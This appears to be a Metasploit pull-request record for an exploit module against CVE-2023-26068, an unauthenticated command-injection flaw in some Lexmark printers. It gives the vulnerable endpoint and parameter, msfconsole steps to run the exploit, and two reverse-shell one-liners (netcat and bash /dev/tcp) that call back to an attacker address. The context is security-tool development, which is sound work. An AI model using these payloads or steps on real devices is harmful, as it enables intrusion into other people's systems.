### PR TITLE
Lexmark Device Embedded Web Server RCE (CVE-2023-26068)

### LINKED ISSUE #18332: Create module for Lexmark Device RCE (CVE-2023-26068)
## Summary

This would will gain RCE on a Lexmark device by exploiting the vulnerable `/cgi-bin/fax_change_faxtrace_settings` endpoint 

### Basic example

[Blog](https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/)
[PoC](https://github.com/horizon3ai/CVE-2023-26067/blob/main/Print4Shell.py)

### Motivation

There are about 160 affected Lexmark devices, seems like a good add to the framework.

### PR DESCRIPTION
**Pull request by jheysel-r7**
A unauthenticated Remote Code Execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19.The vulnerability is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user. If no Admin user is created the endpoint `/cgi-bin/fax_change_faxtrace_settings` is accessible without authentication. The endpoint allows the user to configure a number of different fax settings. A number of the configurable parameters on the page (ex. `FT_Custom_lbtrace`) fail to be sanitized properly before being used in an bash eval statement: `eval "$cmd" > /dev/null`, allowing for an unauthenticated user to run arbitrary commands.

## Verification

Steps needed to make sure this thing works, if you have a Lexmark Device:

- [ ] Start `msfconsole`
- [ ] Do: `use exploit/linux/http/lexmark_faxtrace_settings`
- [ ] Do: `set RHOST [IP]`
- [ ] Do: `set LHOST [IP]`
- [ ] Do: `exploit`

If you're unable to test on a physical device, check out this screen recording (I'd be happy to attach a pcap as well)

https://github.com/rapid7/metasploit-framework/assets/23320005/ba11e84c-4041-4283-a0e4-2dbe61daf734

## Reasoning behind cmd/unix/reverse_socat_tcp addition
I was hoping this module would provide multiple target options, one of them returning a Meterpreter session but couldn't get any other payloads working. Below is a list of what I tried:

### Fetch payloads / droppers
The filesystem is pretty protected. Most of it is read only - the few places the `httpd` user can write to have been mounted with `noexec` option set.

### cmd/unix/reverse_netcat
The `nc` binary does exist on the target and you can write the `fifo` to `/tmp` but i guess the `noexec` also prevents that from working.
`mkfifo /tmp/venlqxe; nc 192.168.1.72 4444 0</tmp/venlqxe | /bin/sh >/tmp/venlqxe 2>&1; rm /tmp/venlqxe`

### cmd/unix/reverse_bash
There's no `/dev/tcp` on the target
`bash -c '0<&85-;exec 85<>/dev/tcp/192.168.1.72/4444;sh <&85 >&85 2>&85'`

### cmd/unix/reverse_socat_udp
Runs but doesn't return a session

### cmd/unix/reverse_socat_sctp
Protocol is not supported?
```
	[-] Handler failed to bind to 192.168.1.72:4444:-  -
	[-] Handler failed to bind to 0.0.0.0:4444:-  -
	[-] Exploit failed: Errno::EPROTONOSUPPORT Protocol not supported - socket(2)
```
### python/shell_reverse_tcp
`python` exists on the target although none of the python payloads were working possibly due to length limitations.

### CODE REVIEW

File: modules/exploits/linux/http/lexmark_faxtrace_settings.rb [hunk 1]
```diff
@@ -0,0 +1,115 @@
...
+      print_status('Waking up the printer...')
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, '/cgi-bin/fax_change_faxtrace_settings'),
+        'method' => 'GET'
+      )
+      if res && res.code == 200
+        break
+      else
+        next
+      end
```
Comment (jvoisin) [inline modules/exploits/linux/http/lexmark_faxtrace_settings.rb:98]:
```suggestion
      if res && res.code == 200
        break
      end
```

File: modules/exploits/linux/http/lexmark_faxtrace_settings.rb [hunk 2]
```diff
@@ -0,0 +1,115 @@
...
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_socat_tcp'
+              }
+            }
```
Comment (smcintyre-r7) [inline modules/exploits/linux/http/lexmark_faxtrace_settings.rb:52]: I think there's a `RequiredCmd` key or something similar that you can use to filter out payloads that you know will work with the embedded device.

File: modules/exploits/linux/http/lexmark_faxtrace_settings.rb [hunk 3]
```diff
@@ -0,0 +1,115 @@
...
+  end
+
+  # If the printer has been inactive for some time it might be sleeping, in which case it's best to send a request
+  # or two to wake it up before running the check method or exploit.
+  def send_wakeup
+    retry_until_truthy(timeout: datastore['SLEEP']) do
+      print_status('Waking up the printer...')
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, '/cgi-bin/fax_change_faxtrace_settings'),
+        'method' => 'GET'
```
[the remark this answers is not in the document]
Comment (jheysel-r7) [reply modules/exploits/linux/http/lexmark_faxtrace_settings.rb]: It does work here, good call.  Updated and tested.

**Review by cdelafuente-r7 — APPROVED** [review]

**Comment by cdelafuente-r7** [comment]
Thanks @jheysel-r7 ! everything looks good to me. I'll go ahead and land it. Thank you for this great module!

**Comment by cdelafuente-r7** [comment]
# Release Notes

This adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.

**Pull request merged**